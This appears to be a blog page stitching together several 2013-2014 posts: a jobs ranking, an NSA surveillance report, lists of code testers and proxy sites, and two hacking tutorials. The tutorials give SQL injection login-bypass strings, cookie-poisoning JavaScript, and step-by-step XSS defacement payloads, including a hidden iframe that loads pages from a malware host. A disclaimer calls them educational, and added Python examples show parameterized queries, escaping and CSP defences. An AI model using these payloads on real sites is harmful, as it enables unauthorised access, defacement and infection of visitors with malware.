
Showing posts with label website. Show all posts

Wednesday 16 April 2014

Most Desirable Job in the World Is…Here

For a new study ranking the best jobs of 2014, jobs website CareerCast.com did some number-crunching and found — perhaps not surprisingly — that crunching numbers is a pretty good gig.
With a median income of $101,360 and a 23% projected job growth rate by 2022, mathematician topped the site’s roundup of the most desirable jobs. CareerCast points to the “exponentially growing popularity of mathematics” in everything from healthcare and technology to sports and politics.
“Mathematicians are employed in every sector of the economy… from Wall Street brokerages to energy exploration companies to IT R&D labs to university classrooms,” CareerCast publisher Tony Lee tells Business Insider.
Companies and government agencies rely more heavily on analytics to make all sorts of decisions today, so employers need people who can generate and parse this data, CareerCast says in its overview. “Mathematical analyses of trends are used to gauge many activities, ranging from internet-user tendencies to airport traffic control.”
Companies looking for all these math whizzes are going to have a tough time, though: As a nation, our math skills stink. A survey of 5,000 Americans between the ages of 16 and 65 last year found that our mathematical abilities are better than those of people in just two other countries — Italy and Spain — and behind the other 18 surveyed by the Organization for Economic Cooperation and Development. “Explanations for the relatively weak performance of the United States include failings in initial schooling, lack of improvement in educational attainment over time, and poor skills in some subpopulations,” the OECD said in a report examining the U.S.’s poor academic showing.
Unfortunately, our kids aren’t any better at math than we are. In fact, when the Program for International Student Assessment evaluated the math skills of teenagers from 65 countries, it found that math scores dropped among U.S. teens. Their math abilities trail not only those of kids from countries like Japan and South Korea, but also Ireland and Poland, whose scores rose above the U.S. in the most recent test.
That’s too bad, because half of CareerCast’s top 10 jobs are in the so-called STEM fields: science, technology, engineering and mathematics. After “tenured university professor” at number two, the next two jobs are statistician and actuary (last year’s top job in CareerCast’s ranking), with median incomes of $75,560 and $93,680, respectively.

Sunday 26 January 2014

Common Methods to Hack a Website

Gone are the days when website hacking was a sophisticated art. Today anybody can go on the Internet and start hacking your website. All that is needed is a Google search with keywords like “how to hack website”, “hack into a website”, “Hacking a website” etc. The following article is not an effort to teach you website hacking; it has more to do with raising awareness of some common website hacking methods.


The Simple SQL Injection Hack

SQL Injection involves entering SQL code into web forms, e.g. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.
When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command. This command checks the data you've entered against the relevant table in the database. If your input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.


In its simplest form, this is how the SQL Injection works. It's impossible to explain this without reverting to code for just a moment. Don't worry, it will all be over soon.
Suppose we enter the following string in a User name field:

' OR 1=1 --

The authorization SQL query that is run by the server, the command which must be satisfied to allow access, will be something along the lines of:
SELECT * FROM users WHERE username = 'USRTEXT'
AND password = 'PASSTEXT'
…where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form.
So entering ' OR 1=1 -- as your username could result in the following actually being run:
SELECT * FROM users WHERE username = '' OR 1=1 -- ' AND password = ''
Two things you need to know about this:
The single quote ['] closes the username text field.
The double dash [--] is the SQL convention for commenting code, and everything after the comment marker is ignored. So the actual routine now becomes:
SELECT * FROM users WHERE username = '' OR 1=1
1 is always equal to 1, last time I checked. So the authorization routine is now validated, and we are ushered in the front door to wreak havoc.
Let's hope you got the gist of that, and move briskly on.

Brilliant! I'm gonna go to hack a Bank! 

Slow down, cowboy. This half-cooked method won't beat the systems they have in place up at Citibank, evidently.
But the process does serve to illustrate just what SQL Injection is all about — injecting code to manipulate a routine via a form, or indeed via the URL. In terms of login bypass via Injection, the hoary old ' OR 1=1 is just one option. If a hacker thinks a site is vulnerable, there are cheat-sheets all over the web for login strings which can gain access to weak systems. Here are a couple more common strings which are used to dupe SQL validation routines:
username field examples:
  • admin'--
  • ') or ('a'='a
  • ") or ("a"="a
  • hi" or "a"="a
… and so on.
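
The query above, built by string concatenation, next to the parameterized form that closes the hole. This is an added example, not code from the original article; it uses Python's sqlite3 module with a constructed in-memory table, and the function names and sample accounts are assumptions made for the demonstration.

```python
import sqlite3

# Login strings quoted in the article above, used as test input.
ARTICLE_STRINGS = ["' OR 1=1 --", "admin'--", "') or ('a'='a"]


def make_db():
    """In-memory users table holding constructed sample accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    # Constructed rows. Plaintext passwords only keep the demo short;
    # a real table stores salted password hashes.
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cret-admin"), ("alice", "correct-horse")])
    return db


def build_concatenated_sql(usrtext, passtext):
    """The article's pattern: form input is pasted into the SQL text."""
    return ("SELECT * FROM users WHERE username = '" + usrtext +
            "' AND password = '" + passtext + "'")


def login_concatenated(db, usrtext, passtext):
    """Vulnerable: the input can close the quote and rewrite the query."""
    sql = build_concatenated_sql(usrtext, passtext)
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, usrtext, passtext):
    """Hardened: the driver binds input as data, never as SQL syntax."""
    row = db.execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?",
        (usrtext, passtext)).fetchone()
    return row is not None


def outcome(login_fn, db, usrtext, passtext=""):
    """Classify a login attempt as 'granted', 'denied' or 'error'.

    'error' is a server-side SQL failure, the kind of unusual response
    the article's defensive checklist treats as a sign of a weak form.
    """
    try:
        return "granted" if login_fn(db, usrtext, passtext) else "denied"
    except sqlite3.Error:
        return "error"


if __name__ == "__main__":
    db = make_db()
    for s in ARTICLE_STRINGS:
        print(f"{s!r:20} concatenated={outcome(login_concatenated, db, s):8}"
              f" parameterized={outcome(login_parameterized, db, s)}")
```

With the bound query every string from the list is compared as an ordinary username and rejected, while a correct username and password still log in.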

Cross site scripting (XSS):
Cross-site scripting, or XSS, is a threat to a website's security. It is the most common and popular way of hacking a website to gain access to information from a user on a website. There are hackers with malicious objectives who use it to attack certain websites on the Internet, but mostly good hackers do this to find security holes in websites and help them find solutions. Cross-site scripting is a security loophole on a website that is hard to detect and stop, making the site vulnerable to attacks from malicious hackers. This security threat leaves the site and its users open to identity theft, financial theft and data theft. It would be advantageous for website owners to understand how cross-site scripting works and how it can affect them and their users, so they can put in place the necessary security systems to block cross-site scripting on their website.

Denial of service (DDoS attack)


A denial of service attack (DoS) is an attack through which a person can render a system unusable, or significantly slow it down for legitimate users, by overloading its resources so that no one can access it. This is not actually hacking a website, but it is used to take down a website.

If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack. This is one of the most used methods for website hacking.




Cookie Poisoning:



Well, for starters I can begin by saying that Cookie Poisoning is a lot like SQL Injection.

Both have 'OR'1'='1 or maybe '1'='1'

But in cookie poisoning you begin by alerting your cookies:

Javascript:alert(document.cookie)

Then you will perhaps see "username=JohnDoe" and "password=iloveJaneDoe".

In this case the cookie poisoning could be:

Javascript:void(document.cookie="username='OR'1'='1"); void(document.cookie="password='OR'1'='1");


There are also many versions of this kind, for example:

'

'1'='1'

'OR'1'='1

'OR'1'='1'OR'


and so on...

You may have to try 13 things before you get it completely right...

Password Cracking


Hashed strings can often be deciphered through 'brute forcing'. Bad news, eh? Yes, and particularly if your encrypted passwords/usernames are floating around in an unprotected file somewhere, and some Google hacker comes across it. 
You might think that just because your password now looks something like XWE42GH64223JHTF6533H in one of those files, it means that it can't be cracked? Wrong. Tools are freely available which will decipher a certain proportion of hashed and similarly encoded passwords.


A Few Defensive Measures

* If you utilize a web content management system, subscribe to the development blog. Update to new versions as soon as possible.
* Update all 3rd party modules as a matter of course — any modules incorporating web forms or enabling member file uploads are a potential threat. Module vulnerabilities can offer access to your full database.
* Harden your Web CMS or publishing platform. For example, if you use WordPress, use this guide as a reference.
* If you have an admin login page for your custom built CMS, why not call it 'Flowers.php' or something, instead of “AdminLogin.php” etc.?
* Enter some confusing data into your login fields, like the sample Injection strings shown above and anything else which you think might confuse the server. If you get an unusual error message disclosing server-generated code, then this may betray vulnerability.
* Do a few Google hacks on your name and your website. Just in case…
* When in doubt, pull the yellow cable out! It won't do you any good, but hey, it rhymes. 

hope u like this article...

Sunday 8 December 2013

Attention: The NSA is Tracking Online Porn Viewers to Discredit


Sitting on the wire, the NSA has the ability to track and make a record of every website you visit.  Today, the Huffington Post revealed that the NSA is using this incredible power to track who visits online porn websites, and to use this information to discredit those it deems dangerous. Their porn habits would then be "exploited to undermine a target's credibility, reputation and authority."   
The story was illustrated with six individuals, none of whom are designated terrorists themselves. Instead, they are deemed "radicalizers," people—two of whom the NSA itself characterized as a "well-known media celebrity" and a "respected academic"—whose speeches and postings allegedly incite hatred or promote offensive jihad.
The report raises the specter of abusing online viewing records to discredit other political opponents of the US government. The NSA document was reviewed not just by the NSA and counter-terrorism officials, but by entities like the Department of Commerce and the US Trade Representative. The USTR negotiates treaties (like the controversial Trans-Pacific Partnership), and one could certainly imagine that the leverage from this program could be useful in pushing for the US position. In fact, EFF and three dozen civil society groups have already asked the NSA to explain if they are spying on those advocating for the public interest in US trade policy.
Ed Snowden's latest revelation may leave SEC officials quaking as the NSA "has been gathering records of online sexual activity and evidence of visits to pornographic websites as part of a proposed plan to harm the reputations of those whom the agency believes are radicalizing others through incendiary speeches." Of course, as we have seen, this 'information' would never be used by the government for non-radical-terrorist suppressing reasons; as the ACLU notes, it is "an unwelcome reminder of what it means to give an intelligence agency unfettered access to individuals' most sensitive information using tactics associated with the secret police services of authoritarian governments."
Via Snowden...
The National Security Agency has been gathering records of online sexual activity and evidence of visits to pornographic websites as part of a proposed plan to harm the reputations of those whom the agency believes are radicalizing others through incendiary speeches, according to a top-secret NSA document.

The document, provided by NSA whistleblower Edward Snowden, identifies six targets, all Muslims, as “exemplars” of how “personal vulnerabilities” can be learned through electronic surveillance, and then exploited to undermine a target’s credibility, reputation and authority.

The NSA document, dated Oct. 3, 2012, repeatedly refers to the power of charges of hypocrisy to undermine such a messenger.
Full ACLU Statement:
The NSA considered discrediting six people by revealing surveillance evidence of their online sexual activity, visits to pornography websites, and other personal information, according to a report today in The Huffington Post. The article cited documents leaked by former NSA contractor Edward Snowden. The targets of the NSA’s plan were all Muslims whom the NSA characterized as “radicals” but who were not believed to be involved in terrorism. The documents say one of the targets was a “U.S. person,” a term describing American citizens and legal permanent residents, but all of the targets were reportedly outside the United States.

American Civil Liberties Union Deputy Legal Director Jameel Jaffer had this reaction:

“This report is an unwelcome reminder of what it means to give an intelligence agency unfettered access to individuals' most sensitive information. One ordinarily associates these kinds of tactics with the secret police services of authoritarian governments. That these tactics have been adopted by the world’s leading democracy – and the world’s most powerful intelligence agency – is truly chilling.”

The administration keeps on attempting to justify the NSA spying by claiming there is oversight from the other branches of government. But, as Pentagon Papers whistleblower Daniel Ellsberg noted in the Why Care About NSA Spying video, spying makes a mockery of that separation. How can that oversight be meaningful if the NSA's huge storehouse of information contains the private viewing habits of every senator, representative, and judge? When the only protection against abuse is internal policies, there is no serious oversight. Congress needs to take action now to rein in the spying.



Friday 29 November 2013

Top 10 Websites To Test Coding Online

In this article I want to outline 10 interesting web apps for testing your code online. All of these apps require an Internet connection, and some of the more advanced editors offer pro plans to upgrade your account features. But most of these tools will surely come in handy when you’re scrambling to debug a block of JavaScript or PHP.
Modern trends and webapps have dramatically changed the way web developers can build. Obviously you need some type of IDE to code new files and save them for deployment. But what about just testing your code snippets? There are more tools available now than ever before!


1. CodePad

codepad is an online compiler/interpreter, and a simple collaboration tool. Paste your code below, and codepad will run it and give you a short URL you can use to share it in chat or email.

2. Write Code Online
The main website for WriteCodeOnline.com actually redirects to their JavaScript editor. You can choose among JS, PHP, and basic URL encoding. Their application is very safe to use and feels lighter than other alternatives.
What’s interesting is that you’ll see the output results directly underneath the text field. So when you hit “run code” it will parse through everything and display the result for you to see. It can be tough debugging some larger PHP scripts because you need to include other files.



3. TinkerBin

Tinkerbin lets you play with HTML, JavaScript and CSS without creating files or uploading to servers. It also supports CoffeeScript, Sass (with Compass), Less, HAML and more. Tinkerbin may actually be my favorite online code editing resource. It supports web developers coding in HTML5/CSS3/JS and renders the output directly on-screen. The application is still in Alpha development, but most of the tools work perfectly and can quickly catch bugs.

4. JS Bin


In a similar fashion as above, jsbin is a simple JavaScript debugging console. Their pitch involves a collaborative effort where you can share a private link with other developers and write together in real time.
As you’re coding different elements the drafts will autosave. You have the ability to download your final product or keep the source code saved online. Their system is much more advanced for exporting and keeping your code as a bare template.

5. JS Fiddle


jsfiddle is one of the most popular playgrounds for web developers. It’s an online editor for snippets built from HTML, CSS and JavaScript. You can also share your code snippets with others and embed them in a blog.

Anybody who has browsed through Stack Overflow must know about jsFiddle. Their interface is a whole lot different compared to JS Bin, along with support for more complex functions. Right away you can sign up for a free account and start saving your code samples online. jsFiddle offers a short URL which you can share around the Web via Twitter, Facebook, even Stack. But notice you do not need an account to start coding. It’s just a handy feature to keep everything organized.
6. CSS Desk



Moving from the world of scripting into stylesheet language, we have CSSDesk. You’ve got a similar setup like all the rest, with your source code on the left and final webpage render on the right. This webapp is great for building small webpage templates and testing the longer CSS3 properties with gradients and box shadows.

7. JSdo.it

 
Some of the apps appear to have Japanese writing which makes me believe it was originally created somewhere in Asia. But what I love about their interface is how you can actually upload files you’ve already created and store them into a project. It’s such an easy process to store full webpage mockups online where you can access and edit them from any computer.

8. Google Code PlayGround


I would recommend saving this tool only as a resource. It’s not perfect for debugging everything you write. But Google is a huge company with a lot of open source API data. If you ever need to pull content from YouTube or custom Google Searches, this is the sandbox you want to use.
Google Code Playground is another great online tool to test and run your code without opening an external editor. All of the APIs are loaded for you in the Pick an API box.

9. IDEOne


What’s so great about their app is how you can quickly debug many different programming languages from the same page. You can also store this source code via a unique URL to share around the Web. However I do feel that their layout is very cluttered with ads and other content, it makes using their website difficult. It would be really cool to see the option of including alternate code libraries, such as Cocoa Touch for iPhone app development.

10. Viper 7 CodePad


This webapp, also named Codepad, is hosted on the website viper-7.com, which also redirects to the same online editor. Their debugging tools are set up for PHP output where you can change between PHP5 and PHP4.
If you create an account you can use their service as a personal storage system. Much like other online editors, you can name each PHP project and keep them hosted online for free. It’s such a powerful code editor because you don’t need any software on your computer at the time. As you parse each script the editor will offer additional meta details, such as browser request & response headers.


Saturday 23 November 2013

How to Deface Website with Cross Site Scripting




Today I am going to teach you how to deface sites which have an XSS vulnerability.

IMPORTANT NOTE: Never implement this technique. I am explaining it for educational purposes only.

Defacing is one of the most common things a hacker does after finding a vulnerability in a website.

Defacing is changing the content of the website to the hacker's content.

Most of the time, attackers use this technique to inform the admin about the vulnerability.

But it's a bad idea!

I have some of the easiest methods to deface XSS-vulnerable sites. I will be teaching you them one by one.

Step 1: Script for changing the background color of a website:

<script>document.body.bgColor="red";</script>

Use this on your target website as:

http://www.targetwebsite.com/<script>document.body.bgColor="red";</script>

Step 2: Script for changing the background image of a website:

<script>document.body.background="http://your_image.jpg/";</script>

Step 3: Defacement page with Pastehtml:

First of all, upload some defacement page (HTML) to pastehtml.com and get the link.

When you find an XSS-vulnerable site, insert the script as:

<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>

This script will redirect the page to your pastehtml defacement page.

Note: You can deface only persistent XSS vulnerable sites.

Step 4: Defacing with iframe injection

What is an IFrame Injection?

Using the iframe tag, attackers inject links to malware-hosting websites into popular websites by means of cross-site scripting. When the usual visitors of those popular sites open the website, they are redirected to the malware-hosting website. The malware is loaded onto your computer, and now you are infected.

What an attacker can do with Iframe Injection?

Using iframe injection, an attacker can inject advertisements inside any other website, insert links to malware-infected sites, redirect to malware-infected sites and more.

Iframe Injection Tutorial:

1. First of all, the attacker finds vulnerable websites using Google dorks.

2. They test the vulnerability by inserting some iframe tag using the URL.

3. Then they insert the malicious iframe code inside the webpage.

For example, he can insert this code using the URL:

Code:

<iframe src="http://malwarewebpages/web.html" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

For PHP webpages:

echo "<iframe src=\"http://malwarewebpages/web.html\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

I have given only some easy methods to deface an XSS-affected page.

It will be noob friendly. There are still more methods to deface it.

Please leave a comment if you have any queries, and share this.
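
The site owner's side of the strings in this post, and of the cross-site scripting section earlier on the page, as an added example that is not part of the original post: user-supplied text is HTML-escaped on output, and the response carries a Content-Security-Policy that refuses inline scripts and frames. It assumes the untrusted text lands in an element body; the function names are hypothetical.

```python
import html
from html.parser import HTMLParser

# Strings quoted in the post above, used here as input to the renderer.
PAGE_STRINGS = [
    '<script>document.body.bgColor="red";</script>',
    '<iframe src="http://malwarewebpages/web.html" width=1 height=1 '
    'style="visibility:hidden;position:absolute"></iframe>',
]


class TagCollector(HTMLParser):
    """Records every element start tag a parser finds in the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def elements_in(markup):
    """Return the element names that the markup would create."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def render_unescaped(text):
    """Vulnerable: stored or reflected text is pasted into the page."""
    return "<p>" + text + "</p>"


def render_escaped(text):
    """Hardened: <, >, & and quotes become entities, so text stays text."""
    return "<p>" + html.escape(text, quote=True) + "</p>"


def response_headers():
    """Second layer: even if markup slips through, the browser refuses
    inline scripts (no 'unsafe-inline') and any framed document."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy":
            "default-src 'self'; script-src 'self'; "
            "frame-src 'none'; object-src 'none'",
    }


if __name__ == "__main__":
    for s in PAGE_STRINGS:
        print("unescaped ->", elements_in(render_unescaped(s)))
        print("escaped   ->", elements_in(render_escaped(s)))
    print(response_headers()["Content-Security-Policy"])
```

Escaping must match the output context: text written into an attribute, a URL or a script block needs that context's own encoding rather than `html.escape` alone.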


Thursday 31 October 2013

Top 10 Proxy WebSites To Unblock Any Site

If you have a slow connection to a certain website, can’t access it at all because of a restriction by your ISP, workplace or school, or simply want to protect yourself online by hiding your private information, then an online proxy website will help you.
With the assistance of an online proxy service, you do not access your target website (e.g. Facebook) directly. You make a request, the web proxy fetches the web page (and encrypts its content, removes scripts and advertisements), and sends it back to your browser. This makes it possible to unblock any banned site, or surf any site anonymously without leaving your footprint.
While surfing online, we sometimes come across websites which can’t be accessed due to our location or IP restrictions. Have you ever noticed this type of problem while browsing websites? This usually happens because the owner of the website restricts access to specific IP addresses only. Sometimes they also block the IP ranges of a whole country so that no one from that country can access their website or content. The other reason can be that your internet connection provider restricts access to specific websites. Similarly, most USA-based websites are not available in other countries.
In order to access blocked websites, you will need a proxy server that automatically randomizes your IP address and assigns you a different IP address from another country. So, if your IP address is of USA, then you will be able to access websites that are blocked in your country and whose access is limited to US users. For example, YouTube is blocked in Pakistan, and now the only option for opening YouTube in Pakistan is with a proxy. There are also some Google Chrome extensions that can help you open YouTube and other blocked websites with the help of a proxy. Most of the time in colleges, universities, offices etc., internet access is restricted to specific websites only. So, in order to unblock other websites, you can use proxy websites or software.
If you do not want to go through the installation of proxy software, then anonymous browsing with proxy websites is the best option for you. So, in this article I am sharing a list of 5 best free Proxy websites of 2013 that will let you surf the internet anonymously and securely.

1. 000FreeProxy

2. kkProxy

3. MyAddr

4. RX Proxy


5. AnonyMouse


6. Zend2


7. NewIPNow


8. KProxy


9. Mega Proxy


10. AD Free Proxy

